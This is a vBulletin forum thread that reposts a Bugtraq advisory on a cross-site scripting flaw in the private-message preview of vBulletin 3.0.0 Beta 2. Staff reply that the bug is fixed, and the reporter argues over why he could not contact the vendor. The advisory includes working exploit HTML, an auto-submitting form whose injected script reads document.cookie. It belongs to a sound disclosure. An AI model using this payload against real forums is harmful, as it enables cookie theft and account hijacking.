I tried submitting this in the bugs forum, but I can't for some reason, even though I am a vB license owner.

This was posted on bugtraq this afternoon:

--

------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility.
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
http://www.vbulletin.com/
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2
------------------------------------------------------
Vendor Status;
------------------------------------------------------
I can not contact vendor for this issue ! No patch available at the moment;
------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like post thread preview page;
------------------------------------------------------
Exploit Code;
------------------------------------------------------
<html>
<body>
<form action="http://[victim]/forum/private.php" method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You can write your own JS codes
var xss = "\"><script>alert(document.cookie)<\/script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>

*You may need login first

Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@mavituna.com

you can't submit things directly to the bugs forum they have to go in the troubleshooting forum.

This was fixed about 20 minutes ago

you can't submit things directly to the bugs forum they have to go in the troubleshooting forum.

This was fixed about 20 minutes ago
Ahh... that would answer that question, then.... Thanks. :)

Has the fix been applied to the download from the Member's Area?

edit: :o 3.0.0, not 2.3.0, never mind ;)

This was posted on bugtraq this afternoon:
--
------------------------------------------------------
Vendor Status;
------------------------------------------------------
I can not contact vendor for this issue ! No patch available at the moment;Huh? Why can't he contact the vendor? We are always available via our forums and support system. :confused:

i am running an old 3.0 beta from two weeks ago, can i quickpatch it or do I need to reupload everything?

My response to BugTraq:This bug was fixed within ten minutes of our being told about this report.

As for claims that the reporter was unable to contact us, I am rather surprised - we have scoured our support ticket system which accepts all email for @vbulletin.com and found nothing, we have all checked our own email and found nothing, so I'm not sure how hard the reporter tried to contact us in actual fact.

vBulletin 3 is not yet in public beta, so the number of sites affected will be extremely small, and in any case the fixed version is available for those customers who are part of the private beta to download.

Kier Darby
Product Manager, vBulletin

i am running an old 3.0 beta from two weeks ago, can i quickpatch it or do I need to reupload everything?
You should probably re-upload everything because the number of changes made over the last two weeks would make any "quickfix" incompatible with the software you have installed.

One of the conditions to being in the current beta was that you would maintain up-to-date files on your forums for testing.

One of the conditions to being in the current beta was that you would maintain up-to-date files on your forums for testing.

yeah I know. My connection has been going up and down and now I am moving to a different provider. I'll do it this weekend.

Got a reply back from the bug reporting person...

Still not sure how he can claim that he was unable to contact us.

Thank you for patched it but at your site all contact informations just for your customers you want username and password. So I can try to contact to you;

You must put a contact e-mail your website to this kind of issues.

Also PHPNuke is the same;
When I try to contact theres is no e-mail account on their websiste. Also when I try to contact admin@phpnuke.org. I get an error msg.

So It's not my fault. Give us an email address for reports.

Thank you;


Surely the public forums would have been an appropriate place to contact us, either by posting a new thread or by sending a private message to one of the site administrators?

Kier Darby

Got a reply back from the bug reporting person...

Still not sure how he can claim that he was unable to contact us.
Or the Contact Us link at the bottom of every page.

Hello;
Yes, In fact you are right,

Before you I just discovered a vuln. in PHPNuke after that I try to inform the PHPNuke vendors I can not access them anyway !

I try to guess email adresses etc. But I couldn't contact vendor. All emails turn back to me

After this I found this vuln. in Vbulletin and then I tried to find an email adress in your website, I joined the community and try to send a message to bug section but It's closed for new posts.

I tried to contact via supprt but you say "you have to be our paid customers
! You need login etc.."
After all of them I prefer to send this vuln. in public, I can't think about sending a private message an admin.

After that I send an email to Sitepoint Forums about these and I told them to "plese report this to Vbulletin for me";

I'm a web seurity manager, I don't get money for these vulns.,
So I try to help people and other application developers to build more
secure applications.

Sorry if my report affected your product reputation bad. I think vbulletin
one of the most secure PHP app.

Thank you;
Ferruh Mavituna

Well he didn't send an email to SitePoint while I was an employee there so he must have found it after April 1st.